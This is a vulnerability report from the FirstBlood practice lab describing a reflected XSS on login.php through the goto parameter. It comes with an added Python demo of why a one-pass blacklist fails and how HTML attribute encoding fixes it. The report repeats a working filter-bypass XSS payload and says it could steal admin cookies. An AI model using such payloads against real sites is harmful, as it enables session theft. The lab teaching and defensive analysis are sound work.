FirstBlood-#420 — Reflective XSS on login.php
This issue was discovered on FirstBlood v2
On 2021-10-25, shivam18u Level 3 reported:
Hi Sean,
I found a reflective XSS on login.php page using a hidden parameter goto.
By visiting the link https://20380f62fd41-shivam18u.a.firstbloodhackers.com/login.php?goto=hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E, the XSS can be triggered.
Payload: hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E
By using a script stored on a remote server, you can bypass the filters.
This can be used to steal admin's cookies.
Have a nice day!
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.
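The nested `<scr<script>ipt>` / `alealertrt` structure of the reported payload is the signature of a single-pass blacklist that deletes `<script>` and `alert` once and then reflects the remainder into the `value` attribute. The example below is added here and is not code from the report or from the FirstBlood application: it reconstructs that hypothetical filter, shows that the page's own payload survives it intact, and shows the fix that does hold in this context, which is attribute-context HTML encoding (`html.escape` here; `htmlspecialchars($goto, ENT_QUOTES)` in PHP) applied consistently on every endpoint, legacy code included.

```python
import html
import re
from urllib.parse import unquote

# URL-decoded form of the payload quoted in the report (constructed from the page).
REPORTED_PAYLOAD = unquote(
    "hello%22%3E%3Cscr%3Cscript%3Eipt%3Ealealertrt`1`%3C/scr%3C/script%3Eipt%3E"
)

# Hypothetical blacklist filter: one pass that deletes <script>, </script> and "alert".
# Deleting an inner token glues the surrounding fragments back into the forbidden token,
# so the output still contains exactly what the filter meant to remove.
BLACKLIST = re.compile(r"</?script>|alert", re.IGNORECASE)


def strip_blacklist_once(value: str) -> str:
    """Single-pass deletion (the flawed approach)."""
    return BLACKLIST.sub("", value)


def render_goto_input_unsafe(goto: str) -> str:
    """Reflect ?goto= into a hidden input after the one-pass strip."""
    return f'<input type="hidden" name="goto" value="{strip_blacklist_once(goto)}">'


def render_goto_input_safe(goto: str) -> str:
    """Encode for the HTML attribute context instead of deleting tokens.

    quote=True also encodes the double quote, so the value cannot close the
    attribute early; the encoded text contains no '<', '>' or '"' at all.
    """
    return f'<input type="hidden" name="goto" value="{html.escape(goto, quote=True)}">'


def contains_script_tag(markup: str) -> bool:
    """Detection helper: does the rendered markup contain a literal <script> tag?"""
    return re.search(r"<script>", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("after one-pass strip:", strip_blacklist_once(REPORTED_PAYLOAD))
    print("unsafe render has <script>:", contains_script_tag(render_goto_input_unsafe(REPORTED_PAYLOAD)))
    print("safe render has <script>:  ", contains_script_tag(render_goto_input_safe(REPORTED_PAYLOAD)))
```

The safe renderer does not try to recognise dangerous input at all, which is why it cannot be defeated by nesting; the same encoding must be applied on login.php as on the endpoint fixed under ID 39.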